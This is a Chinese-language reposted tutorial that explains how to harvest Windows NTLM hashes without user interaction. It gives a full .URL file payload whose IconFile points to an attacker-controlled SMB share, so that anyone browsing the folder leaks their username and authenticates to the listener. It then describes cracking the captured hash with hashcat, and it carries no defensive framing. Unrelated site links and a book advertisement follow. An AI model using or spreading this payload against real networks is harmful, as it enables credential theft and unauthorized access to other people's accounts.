内容简介:这段时间我在微博上翻看了大量的帖子,其中有一篇来自@insertscript的帖子,介绍了一种无交互式抓取哈希值的技巧。其使用.URL文件访问环境变量,用户无需任何用户交互即可连接到攻击者的文件共享。以下内容摘自@insertscript的帖子:“只要explorer.exe的的查看包含.URL文件的文件夹,它就会在发送实际请求之前查找任何指定的环境变量,如%PATH%或%USERNAME%,从而将内容泄露给由攻击者控制的服务器。“(
这段时间我在微博上翻看了大量的帖子,其中有一篇来自@insertscript的帖子,介绍了一种无交互式抓取哈希值的技巧。其使用.URL文件访问环境变量,用户无需任何用户交互即可连接到攻击者的文件共享。
以下内容摘自@insertscript的帖子:
“只要explorer.exe的的查看包含.URL文件的文件夹,它就会在发送实际请求之前查找任何指定的环境变量,如%PATH%或%USERNAME%,从而将内容泄露给由攻击者控制的服务器。“( https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html )
首先,我们在攻击机上设置SMBListener(通常情况下在内网环境中,大多数公司都会阻止SMB流量出站)。
接着,我们在文件共享上创建一个文本文件。(创建文件后,你可以将其放在任何共享上)。
将以下内容粘贴到文本文件中:
[InternetShortcut] URL=whatever WorkingDirectory=whatever IconFile=\\PutYourSmbListenerShareHere\%USERNAME%.icon IconIndex=1
以上你只需将IconFile PATH替换为你在SMBServer,Responder或Inveigh中设置的共享即可。注意:这里的%USERNAME%。icon不要改动。如下:
现在,请确保你已勾选文件名扩展和隐藏文件选项。
使用.URL扩展重命名文件注意:当使用相同文件名时,将导致无法正常工作因此,建议大家每次都只创建唯一的文件名(例如1.url,2.url等)!
重命名后应该看起来像下面这样:
此时,在你的smb listener应该已经获取到了一个连接!
现在,任何人只要访问该共享,都将尝试自动的向你的SMB listener进行身份验证。
复制哈希并使用hashcat破解。
将其粘贴到文件中
启动hashcat(希望密码包含在你的字典列表中)
成功解出了密码!
最后,感谢@insertscript的分享!也希望大家可以在微博上关注我(@_markmo_),我会第一时间向大家分享我学到的东西,就像其他人给予我的一样!
*参考来源: medium ,FB小编secist编译,转载请注明来自FreeBuf.COM
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- JavaScript与HTML交互系列--事件流(冒泡、捕获、应用)和事件处理程序
- js捕获错误信息
- Python捕获所有异常
- Android NativeCrash 捕获与解析
- Wireshark如何捕获USB流量
- 在 Docker 容器中捕获信号
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
我的第一本算法书
[日]石田保辉、[日]宮崎修一 / 张贝 / 人民邮电出版社 / 2018-10 / 69.00元
本书采用大量图片,通过详细的分步讲解,以直观、易懂的方式展现了7个数据结构和26个基础算法的基本原理。第1章介绍了链表、数组、栈等7个数据结构;从第2章到第7章,分别介绍了和排序、查找、图论、安全、聚类等相关的26个基础算法,内容涉及冒泡排序、二分查找、广度优先搜索、哈希函数、迪菲 - 赫尔曼密钥交换、k-means 算法等。 本书没有枯燥的理论和复杂的公式,而是通过大量的步骤图帮助读者加深......一起来看看 《我的第一本算法书》 这本书的介绍吧!